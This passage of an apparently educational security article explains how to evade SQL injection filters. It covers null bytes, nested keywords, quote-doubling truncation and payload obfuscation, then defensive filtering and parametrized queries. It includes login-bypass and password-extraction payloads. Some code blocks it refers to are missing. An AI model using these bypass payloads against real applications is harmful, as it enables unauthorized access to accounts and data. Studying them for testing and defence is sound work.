    However, when the same input is processed by the application, in a managed code context, the full input following the null byte will be processed, allowing your exploit to be executed. To perform a null byte attack, you simply need to supply a URL-encoded null byte (%00) prior to any characters that the filter is blocking. In the original example, you may be able to circumvent native input filters using an attack string such as the following:

    ' UNION SELECT password FROM tblUsers WHERE username='admin'--


    Note: When Microsoft Access is used as the back-end database, NULL bytes can be used as an SQL query delimiter.
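The native/managed mismatch is easy to reproduce from Python, because ctypes.c_char_p reads a buffer the way C reads a char*: up to the first NUL and no further. The example below is added here (not the article's code) and shows the filter that only sees the prefix, the application that sees the whole buffer, and the hardened filter that rejects NUL outright and matches on the full length. The token list and the request value are constructed for the demonstration.

```python
import ctypes
from urllib.parse import unquote_to_bytes

# Constructed blacklist for the demonstration.
BLOCKED_TOKENS = (b"union", b"select", b"--")


def native_view(data: bytes) -> bytes:
    """What a C-style filter sees: c_char_p reads the buffer like a char*,
    so everything after the first NUL is invisible to it."""
    return ctypes.c_char_p(data).value or b""


def native_filter_blocks(data: bytes) -> bool:
    """The flawed filter: blacklist applied to the NUL-terminated view."""
    view = native_view(data).lower()
    return any(token in view for token in BLOCKED_TOKENS)


def managed_view(data: bytes) -> str:
    """What the managed-code application sees: the whole buffer, NUL included,
    because its strings carry an explicit length (latin-1 keeps every byte)."""
    return data.decode("latin-1")


def hardened_filter_blocks(data: bytes) -> bool:
    """Fix: a NUL byte has no place in a form field, so reject it outright, and
    match on the full, length-delimited buffer rather than on a char* view."""
    if b"\x00" in data:
        return True
    view = data.lower()
    return any(token in view for token in BLOCKED_TOKENS)


# Constructed request parameter: a harmless prefix, a URL-encoded NUL, then the
# UNION query from the article, exactly as a client would submit it.
SMUGGLED = unquote_to_bytes("x%00%27%20UNION%20SELECT%20password%20FROM%20tblUsers--")


if __name__ == "__main__":
    print("native filter sees :", native_view(SMUGGLED))
    print("application sees   :", managed_view(SMUGGLED))
    print("native filter blocks   :", native_filter_blocks(SMUGGLED))
    print("hardened filter blocks :", hardened_filter_blocks(SMUGGLED))
```

The same check belongs at every trust boundary where a native component (WAF, IDS, a C extension) hands data to a managed runtime: compare lengths before and after, and treat any disagreement as a reason to drop the request.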

    Nesting Stripped Expressions

    Some sanitizing filters strip certain characters or expressions from user input, and then process the remaining data in the usual way. If an expression that is being stripped contains two or more characters, and the filter is not applied recursively, you can normally defeat the filter by nesting the banned expression inside itself.

    For example, if the SQL keyword SELECT is being stripped from your input, you can use the following input to defeat the filter:


    SELSELECTECT


    Note:
    See the simplicity of bypassing the stupid filter.
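Added example (not from the article): a single-pass strip next to a strip that is repeated until the input stops changing, bounded so that deeply nested input is rejected instead of being processed or looped over indefinitely. The banned keyword and the round limit are assumptions; the nested input is the article's.

```python
import re

# The keyword the article's sanitizer strips (constructed single-keyword policy).
BANNED = re.compile(r"select", re.IGNORECASE)


def strip_once(value: str) -> str:
    """Single pass, as the naive sanitizer does: SELSELECTECT -> SELECT."""
    return BANNED.sub("", value)


def strip_until_stable(value: str, max_rounds: int = 10):
    """Reapply the filter until the text stops changing, so nested copies cannot
    reassemble the keyword. Returns None when the bound is reached: input that keeps
    changing for that many rounds is adversarial and should be rejected, not processed."""
    for _ in range(max_rounds):
        stripped = BANNED.sub("", value)
        if stripped == value:
            return value
        value = stripped
    return None


if __name__ == "__main__":
    print(strip_once("SELSELECTECT"))          # the keyword survives
    print(repr(strip_until_stable("SELSELECTECT")))
```

Even the fixed-point version only removes one spelling of one keyword; combined with the case, comment and encoding tricks earlier in the article, stripping remains a weaker choice than rejecting the request, which is the countermeasure the article comes back to at the end.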

    Exploiting Truncation

    Sanitizing filters often perform several operations on user-supplied data, and occasionally one of the steps is to truncate the input to a maximum length, perhaps in an effort to prevent buffer overflow attacks, or to accommodate data within database fields that have a predefined maximum length. Consider a login function which performs the following SQL query, incorporating two items of user-supplied input:

    SELECT uid FROM tblUsers WHERE username = 'jlo' AND password = 'r1Mj06'


    Suppose the application employs a sanitizing filter, which performs the following steps:


    1-Doubles up quotation marks, replacing each instance of a single quote (') with two single quotes ('')
    2-Truncates each item to 16 characters.

    If you supply a typical SQL injection attack vector such as:

    admin'--


    The following query will be executed, and your attack will fail:


    SELECT uid FROM tblUsers WHERE username = 'admin''--' AND password = ''


    Note: The doubled-up quotes mean that your input fails to terminate the username string, and so the query actually checks for a user with the literal username you supplied. However, if you instead supply the username aaaaaaaaaaaaaaa' which contains 15 a’s and one quotation mark, the application first doubles up the quote, resulting in a 17-character string, and then removes the additional quote by truncating to 16 characters. This enables you to smuggle an unescaped quotation mark into the query, thus interfering with its syntax:

    SELECT uid FROM tblUsers WHERE username = 'aaaaaaaaaaaaaaa'' AND password = ''


    Note: This initial attack results in an error, because you effectively have an unterminated string

    Each pair of quotes following the a’s represents an escaped quote, and there is no final quote to delimit the user-name string. However, because you have a second insertion point, in the password field, you can restore the syntactic validity of the query, and bypass the login, by also supplying the following password:

    or 1=1--

    This causes the application to perform the following query:

    SELECT uid FROM tblUsers WHERE username = 'aaaaaaaaaaaaaaa'' AND password = 'or 1=1--'


    When the database executes this query, it checks for table entries where the literal username is


    aaaaaaaaaaaaaaa' AND password =


    which is presumably always false, or where 1 = 1, which is always true. Hence, the query will return the UID of every user in the table, typically causing the application to log you in as the first user in the table. To log in as a specific user (e.g., with UID 0), you would supply a password such as the following:

    or uid=0--



    Note:
    This query is considered to be a very old technique used for authentication bypass or privilege escalation.

    Using fuzzdb for Web Application black box testing
    Fuzzdb aggregates known attack patterns, predictable resource names, server response messages, and other resources like web shells into the most comprehensive Open Source database of malicious and malformed input test cases. Using fuzzdb attack patterns to test Web Applications is a must nowadays. Importing the fuzzdb lists to Web Fuzzers should be very common if you want to get some real results. If you use fuzzdb along with Burp Scanner, Intruder and all other features you are definitely going to get better results even from any Web Application Scanner.

    What's in fuzzdb?

    So what is fuzzdb?
    1-Fuzzdb is a collection of attack patterns: Categorized by platform, language, and attack type, malicious and malformed inputs known to cause information leakage and exploitation have been collected into sets of test cases. FuzzDB contains comprehensive lists of attack payloads known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, http header crlf injections, and more.

    2-Fuzzdb is a collection of response analysis strings: since system responses also contain predictable strings, fuzzdb contains a set of regex pattern dictionaries, such as interesting error messages to aid the detection of software security defects, lists of common session ID cookie names, and more.

    3-Fuzzdb is a collection of other useful stuff: Webshells, common password and username lists, and some handy wordlists.

    4-Fuzzdb is a collection of documentation: helpful documentation and cheat sheets sourced from around the web that are relevant to the payload categories.

    Mutating fuzzdb payloads using Python

    With Python you can very easily mutate all interesting attack patterns concerning SQL injection, feed them to Burp Intruder as an attack list and use them to test Web Applications. There are numerous code examples for Python and even a very novice programmer can learn text manipulation with Python. The two basic modules you will have to use to perform the mutations are:

    1-Standard module: string
    2-Standard module: re

    The string module contains several types of things, such as functions, methods, and classes; it also contains strings of common constants. The re module obsoletes the regex and regsub modules that you may see used in some older Python code. While there are still a few limited advantages to regex, they are minor and it is not worth using in new code.

    About Python regular expressions


    A regular expression in Python is a concise way of describing a pattern that might occur in a text. With Python regular expressions you can answer questions such as:

    1-Do certain characters occur?
    2-In a particular order?
    3-Are sub-patterns repeated a given number of times?
    4-Do other sub-patterns exclude a match?

    Conceptually, this is not unlike the way you would intuitively describe a pattern in a natural language. The trick is encoding this description in the compact syntax of regular expressions. When approaching a regular expression, treat it as its own programming problem, even though only one or two lines of code may be involved; those lines effectively form a small program.

    URL-encoding using Python


    Mutating payloads is easy with Python, so when you want to URL-encode the SQL injection inputs from fuzzdb you can use the very simple Python script displayed below:


    Note: In the above example you can see how easy it is to URL-encode the fuzzdb list and then feed the output to Burp Intruder to test the application. It is obviously not the best Python code for URL encoding, but I had no time so I did it the nasty way.

    Gap filter bypass using Python


    With Python you can very easily replace the gaps (spaces) with the character sequence /**/; the following code shows exactly that:





    Note: See how easy and simple SQL comment gap replacement is. You can use SQL comments not only to fill the gaps but also to insert them within ordinary SQL queries.

    Again with Python you can very easily replace the gaps with the character sequence %20; the following code shows exactly that:





    Note: Again see how easy and simple this is (the web application decodes the %20 sequence back into a space).

    Using Null Bytes with Python to bypass filters


    With Python you can very easily prepend the null character to the beginning of each line; the following code shows exactly that:

    Note: Again see how easy and simple it is to add the null character at the beginning of each line.

    Analyzing SQL Injection counter measures

    The only ways someone should defend against SQL injection attacks are the following, and only the following:

    1-White list filters
    2-Black and white list hybrid filters (not only black list filters)
    3-Parametrized SQL queries
    4-Stored procedures with proper privilege assignments

    White list filters

    White list filtering should be easy to understand: you just use a web server control that accepts only a certain set of characters and rejects all others. The concept is presented below:





    Note:
    The white list filter accepts only ASCII characters and rejects all other characters (this is an example and does not mean that SQL injection is blocked by allowing the ASCII character set).

    White list filtering should be your first choice when implementing Web Application filtering mechanisms, especially when the input is very specific, such as credit card numbers. Also white list filtering has better performance when compared to black list filters with long black lists.

    Black list filters

    Black list filtering should also be easy to understand: you just use a web server control that rejects only certain sets of characters and accepts all others. The concept is presented below:




    Note: The black list filter rejects only single quotes and accepts all other characters (this is an example and does not mean that SQL injection is prevented by blocking single quote characters).

    Why do people use black list filters? Simply because they want an easy solution to protect multiple web applications with generic SQL black list filters that apply to their whole web application infrastructure. If someone wanted, for example, to protect his/her web application, he/she would block the single quote for all web applications and that way add an extra layer of security (or at least that is what he/she thinks). It is also common knowledge that in order to properly configure a Web Application Firewall you would have to be a web system administrator and a web developer at the same time, which in most companies does not happen. WAFs give you the option of properly configuring white list filters if you know how the web application works (e.g. HTTP request throttling, allowed character set per HTML form, etc.), but in the majority of situations the developer of the web application to be protected is not going to do the WAF configuration.

    For the reasons explained above, the black list filtering methodology is unfortunately adopted by many developers and by vendors that develop IPS/IDS, WAF and firewall devices. Developers and system engineers lack imagination and are not really interested in bypassing their own filters or in doing a good job of understanding hacking.

    IMPORTANT NOTE: If you believe that you have an important Web Application and you need to protect it then DO NOT:

    1-Think that the company WAF/IPS is going to block any advanced SQL injection attack.
    2-Use black list filtering; it is WRONG because most of the time it does not provide real-world protection.
    3-Use only automated web security scanners to test business-critical web sites. Note: Manual penetration testing is essential before deploying business-critical web applications to production.

    Black and white list hybrid filters


    Black and white list hybrid filtering should again be easy to understand: you just use a web server control that first accepts certain sets of characters and then rejects certain character sequences from the accepted set. This type of filter is the most effective and should be used as an alternative to white list filtering IF AND ONLY IF WHITE LIST FILTERING DOES NOT DO THE JOB.



    Note: The white/black list hybrid filter displayed above accepts ASCII characters and then filters single quotes out of the accepted set. This is meaningful if, for example, you want to accept single quotes only in a certain position: you might want to allow the string Mr Smith's but not Mr' Smiths. You can do that if you implement "both types of filters" in a single regular expression.

    It is important to understand that when you use white/black list hybrid filters to sanitize your input, it means you have excluded white list filtering because it is not going to do the job properly. It should also be noted that the black list filter is better applied after the white list filter for performance reasons (imagine having a long ugly list of character sequences to run through your input). It should also be clear by now that, when you use white/black list hybrid filtering, in the black list part you would want to filter certain characters based on:

    1-The position within the user-supplied input (e.g. if you allow the + character then it should not be placed within strings such as var+iable, where variable is a critical web application variable).
    2-Certain sequences of bad characters but not the characters themselves (e.g. block '-- , '# or '+' but do not block ++).

    Note: Filtering malicious user input is not so difficult; you just have to have the correct mentality.
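
    Here is how the three filter types discussed above (the ASCII white list, the single-quote black list, and the hybrid that allows Mr Smith's but rejects Mr' Smiths along with the '-- , '# and '+' sequences) look as regular expressions. This is an added Python example, not code from the original post; the exact character ranges and function names are my own choices.

```python
import re

# Added example (not from the original post): the three filter kinds described
# in the text, each expressed as a regular expression over the raw input.

# White list: accept only printable ASCII. As the post notes, allowing the full
# printable set does NOT by itself stop SQL injection; it is the cheap first gate.
WHITE_LIST = re.compile(r"^[\x20-\x7e]*$")

# Black list: reject any input that contains a single quote, accept everything else.
BLACK_LIST = re.compile(r"'")

# Hybrid, black list part: the bad sequences named in the text ('-- , '# and '+'),
# plus a quote that is not an apostrophe sitting between two letters.
BAD_SEQUENCES = re.compile(r"'--|'#|'\+'")
STRAY_QUOTE = re.compile(r"(?<![A-Za-z])'|'(?![A-Za-z])")


def white_list_filter(value: str) -> bool:
    """Accept only if every character is in the allowed set."""
    return WHITE_LIST.match(value) is not None


def black_list_filter(value: str) -> bool:
    """Reject only if a single quote appears anywhere; accept all else."""
    return BLACK_LIST.search(value) is None


def hybrid_filter(value: str) -> bool:
    """White list first (cheap), then the narrower black list on what survived.

    "Mr Smith's" passes (quote between letters); "Mr' Smiths" is rejected
    (quote followed by a space); "a++b" passes because only '+' with quotes
    around it is listed as a bad sequence.
    """
    if not white_list_filter(value):
        return False
    if BAD_SEQUENCES.search(value) is not None:
        return False
    return STRAY_QUOTE.search(value) is None
```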
    Web Application Firewall black list mentality

    I talked about white list filtering, I talked about black list filtering, I even mentioned hybrid filters. What I did not talk about is the black list filter mentality that "lives" in big and profitable organizations. In "profitable" big organizations such as banks or big software vendors you will find something they call the information technology (IT) operations team (ITOPT). ITOPT is responsible for deploying the web applications, applying proper patches and making sure that everyone is happy and everything is up and running. Now what happens is that these guys will ask information security consultants who have never performed a single decent web application penetration test in their life to help them deploy THE Web Application Firewall (WAF). So what happens next is that the consultants propose a simple low-cost black list filtering approach. Why? Because it is an easy and generic solution (sounds like a smart move, eh?). DAAAA, this is when the trouble starts: applying the same black list filter to all the custom company web applications is Wrong.

    The following picture shows a conceptual representation of bad WAF configuration:



    Note: You see what is wrong here: the same filter is applied to all web applications, without taking into consideration the special needs of each web application separately.

    Parametrized SQL queries


    With most development platforms, parametrized statements can be used; they work with type-fixed parameters (sometimes called placeholders or bind variables) instead of embedding user input in the statement text. A placeholder can only store a value of the given type and not an arbitrary SQL fragment, so an SQL injection attempt is simply treated as a strange (and probably invalid) parameter value.
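
    To make the placeholder behaviour concrete, here is the same lookup written with string concatenation and with a bound parameter, run against an in-memory SQLite database. This is an added Python example, not code from the original post; the table, the sample rows and the function names are constructed for the demonstration.

```python
import sqlite3

# Added example (not from the original post): a concatenated query next to a
# parametrized one, exercised against constructed sample data in SQLite.


def make_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database with constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("o'neil", "user")],
    )
    return conn


def lookup_concatenated(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: the user-supplied value becomes part of the SQL text."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> list:
    """Safe: the placeholder can hold only a value, never an SQL fragment."""
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def concatenation_fails(conn: sqlite3.Connection, name: str) -> bool:
    """True if the concatenated query is rejected by the SQL parser.

    A legitimate apostrophe (o'neil) breaks the concatenated statement, while
    the parametrized version treats it as ordinary data.
    """
    try:
        lookup_concatenated(conn, name)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"  # classic textbook input, constructed for the demo
    print(lookup_concatenated(db, tautology))   # every user name comes back
    print(lookup_parameterized(db, tautology))  # []: no user has that exact name
    print(lookup_parameterized(db, "o'neil"))   # ["o'neil"]: the quote is just data
```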

    Stored procedures with proper privilege assignments

    Stored procedures are implemented differently in every database, so for each database we will give a different definition:

    For MSSQL: Stored procedures in MSSQL mean pre-compiled execution. SQL Server compiles each stored procedure once and then reuses the execution plan when the stored procedure is invoked. This results in a tremendous performance boost when stored procedures are called repeatedly, and the typed parameters also provide forced type-casting protection.

    For MySQL: Stored procedures increase the performance of the application. Once created, a stored procedure is compiled and stored in the database catalog. It runs faster than uncompiled SQL commands sent from the application, and of course compiled code means type-casting safety.

    For Oracle: Stored procedures provide a powerful way to code application logic that can be stored on the server. The language used to code stored procedures is a database-specific procedural extension of SQL (in Oracle it is PL/SQL); dynamic SQL can be used in:

    1-EXECUTE IMMEDIATE statements
    2-DBMS_SQL package
    3-Cursors

    Tools that can obfuscate for you

    For these types of attacks there is a tool written by Gerasimos Kassaras (this is me) that can obfuscate SQL payloads (and other payloads): the Teenage Mutant Ninja Turtles tool project, which you can download from here.

    The Teenage Mutant Ninja Turtles project is four things:


    1-A Web Application payload database.
    2-A Web Application error database.
    3-A Web Application payload mutator.
    4-A Web Application payload manager.

    Nowadays all high-profile sites in the financial and telecommunication sectors use filters to filter out all types of vulnerabilities such as SQL injection, XSS, XXE, HTTP header injection, etc. In this particular project I am going to provide you with a tool to generate obfuscated fuzz strings in order to bypass badly implemented web application injection filters (e.g. SQL, XSS and path-traversal injections). Also, with Teenage Mutant Ninja Turtles you will be able to do payload management by generating custom payload lists to test your web application thoroughly for all types of vulnerabilities, such as path traversal and obfuscated SQL payloads.

    Epilogue


    This article aims to become a complete guide for bypassing SQL injection filtering (meaning I am going to do regular updates) used by a wide range of web applications.
